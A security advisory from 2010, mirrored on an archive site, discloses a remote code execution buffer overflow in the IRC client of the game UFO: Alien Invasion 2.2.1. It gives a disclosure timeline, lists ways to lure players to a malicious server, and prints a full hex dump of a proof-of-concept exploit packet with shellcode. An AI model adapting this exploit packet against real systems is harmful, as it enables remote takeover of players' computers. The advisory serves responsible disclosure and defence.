AOH :: HP Unsorted U :: B1A-1322.HTM

UFO: Alien Invasion Remote Arbitrary Code Execution Vulnerability



Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion
Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion



Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion=0D
--------------------------------------------------------------------=0D
=0D
June 18th, 2010=0D
=0D
========0D
Summary=0D
========0D
Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion=0D
Release Date: June 18th, 2010=0D
Discoverer: Jason Geffner=0D
Version Affected: UFO: Alien Invasion 2.2.1=0D
                  (version previous to UFO: Alien Invasion 2.2.1 not tested)=0D
Risk: Very High=0D
Status: Published=0D
=0D
=============0D
Introduction=0D
=============0D
This paper discusses how an unprivileged remote attacker can execute arbitrary=0D
code on networked players' computers. This vulnerability was responsibly=0D
disclosed to the UFO: Alien Invasion project leader and this advisory was not=0D
released until a stable fixed build of the game was released.=0D
=0D
===========0D
Background=0D
===========0D
"UFO: Alien Invasion is an open source strategy video game in which the player=0D
fights aliens that are trying to take control of the Earth. The game is heavily=0D
influenced by the X-COM series (mostly by UFO: Enemy Unknown). It is based on a=0D
modified id Tech 2 engine, and runs on Linux, Microsoft Windows, and Mac OS X=0D
for both PPC and Intel Macs. UFO:AI has been nominated for 'Best project for=0D
Gamers' in the Sourceforge 2007 and 2008 Community Choice Awards and was=0D
positively noted by Linux Journal." [1]=0D
=0D
=========0D
Timeline=0D
=========0D
04/29/08 UFO: Alien Invasion 2.2.1 released=0D
10/28/09 Remote arbitrary code execution vulnerability discovered in UFO: Alien=0D
         Invasion 2.2.1=0D
10/31/09 Detailed vulnerability report responsibly disclosed to the UFO: Alien=0D
         Invasion project leader=0D
11/02/09 Fix checked into source code trunk=0D
06/18/10 Stable build of UFO: Alien Invasion 2.3 released, fixing vulnerability=0D
06/18/10 Advisory released=0D
=0D
==============0D
Vulnerability=0D
==============0D
The IRC client component of UFO: Alien Invasion 2.2.1 contains multiple=0D
security vulnerabilities that allow a malicious IRC server to remotely execute=0D
arbitrary code on the client's system. There are numerous ways that an attacker=0D
could cause a player to connect to a malicious server, for example:=0D
=0D
- Perform a man-in-the-middle attack to inject IRC server responses into the=0D
  TCP stream.=0D
- Use DNS poisoning to redirect the player's client from the real=0D
  irc.freenode.org server to the attacker's malicious server.=0D
- Use the in-game "rcon" functionality against a server to remotely issue the=0D
  command "irc_connect " (passwords for rcon can be=0D
  brute-forced and/or sniffed over the network since they're sent in=0D
  plaintext).=0D
- Use social engineering to convince a player to press ~ and type "irc_connect=0D
  ".=0D
=0D
There are numerous buffer overflow vulnerabilities that can be exploited in the=0D
IRC client component. The following vulnerability can be exploited in a single=0D
packet:=0D
=0D
The Irc_Proto_ParseServerMsg(...) function parses server messages of up to 1024=0D
bytes in length and writes to an irc_server_msg_t structure. This structure's=0D
last field is a 512-byte string buffer. A malformed server response can cause=0D
Irc_Proto_ParseServerMsg(...) to write past the end of the irc_server_msg_t=0D
structure and overwrite the return address for Irc_Logic_ReadMessages(...).=0D
=0D
========0D
Exploit=0D
========0D
See below for a proof-of-concept exploit packet for UFO: Alien Invasion 2.2.1=0D
for Windows. The payload will launch "mspaint.exe" and terminate the UFO: Alien=0D
Invasion process.=0D
=0D
00000000:  30 30 31 20 3a 41 41 41 41 41 41 41 41 41 41 41    001 :AAAAAAAAAAA=0D
00000010:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000020:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000030:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000040:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000050:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000060:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000070:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000080:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000090:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000000f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000100:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000110:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000120:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000130:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000140:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000150:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000160:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000170:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000180:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000190:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
000001f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000200:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000210:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA=0D
00000220:  41 41 41 41 41 41 41 41 41 41 41 41 41 28 50 d2    AAAAAAAAAAAAA(P.=0D
00000230:  0a 2b c9 83 e9 cd e8 ff ff ff ff c0 5e 81 76 0e    .+..........^.v.=0D
00000240:  76 83 85 b6 83 ee fc e2 f4 8a 6b 0c b6 76 83 e5    v.........k..v..=0D
00000250:  3f 93 b2 57 d2 fd d1 b5 3d 24 8f 0e e4 62 08 f7    ?..W....=$...b..=0D
00000260:  9e 79 34 cf 90 47 7c b4 76 da bf e4 ca 74 af a5    .y4..G|.v....t..=0D
00000270:  77 b9 8e 84 71 94 73 d7 e1 fd d1 95 3d 34 bf 84    w...q.s.....=4..=0D
00000280:  66 fd c3 fd 33 b6 f7 cf b7 a6 d3 0e fe 6e 08 dd    f...3........n..=0D
00000290:  96 77 50 66 8a 3f 08 b1 3d 77 55 b4 49 47 43 29    .wPf.?..=wU.IGC)=0D
000002a0:  77 b9 8e 84 71 4e 63 f0 42 75 fe 7d 8d 0b a7 f0    w...qNc.Bu.}....=0D
000002b0:  54 2e 08 dd 92 77 50 e3 3d 7a c8 0e ee 6a 82 56    T....wP.=z...j.V=0D
000002c0:  3d 72 08 84 66 ff c7 a1 92 2d d8 e4 ef 2c d2 7a    =r..f....-...,.z=0D
000002d0:  56 2e dc df 3d 64 68 03 eb 1c 82 08 33 cf 83 85    V...=dh.....3...=0D
000002e0:  b6 26 eb b4 3d 19 04 7a 63 cd 73 30 14 20 eb 23    .&..=..zc.s0. .#=0D
000002f0:  23 cb 1e 7a 63 4a 85 f9 bc f6 78 65 c3 73 38 c2    #..zcJ....xe.s8.=0D
00000300:  a5 04 ec ef b6 25 7c 50 db 05 f3 e4 df 18 f7 ab    .....%|P........=0D
00000310:  d3 0e e6 85 b6 0d 0a                               .......=0D
=0D
===========0D
Conclusion=0D
===========0D
Safe string handling functions should be used instead of their standard CRT=0D
equivalents or inlined string copies.=0D
=0D
================0D
Fix Information=0D
================0D
This issue has now been resolved. UFO: Alien Invasion 2.3 can be downloaded=0D
from http://ufoai.ninex.info/wiki/index.php/Download=0D 
=0D
===========0D
References=0D
===========0D
[1] http://en.wikipedia.org/wiki/UFO:_Alien_Invasion=0D 
=0D
NGSSoftware Insight Security Research=0D
http://www.ngssoftware.com/=0D 
http://www.databasesecurity.com/=0D 
http://www.nextgenss.com/=0D 
+44(0)208 401 0070

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.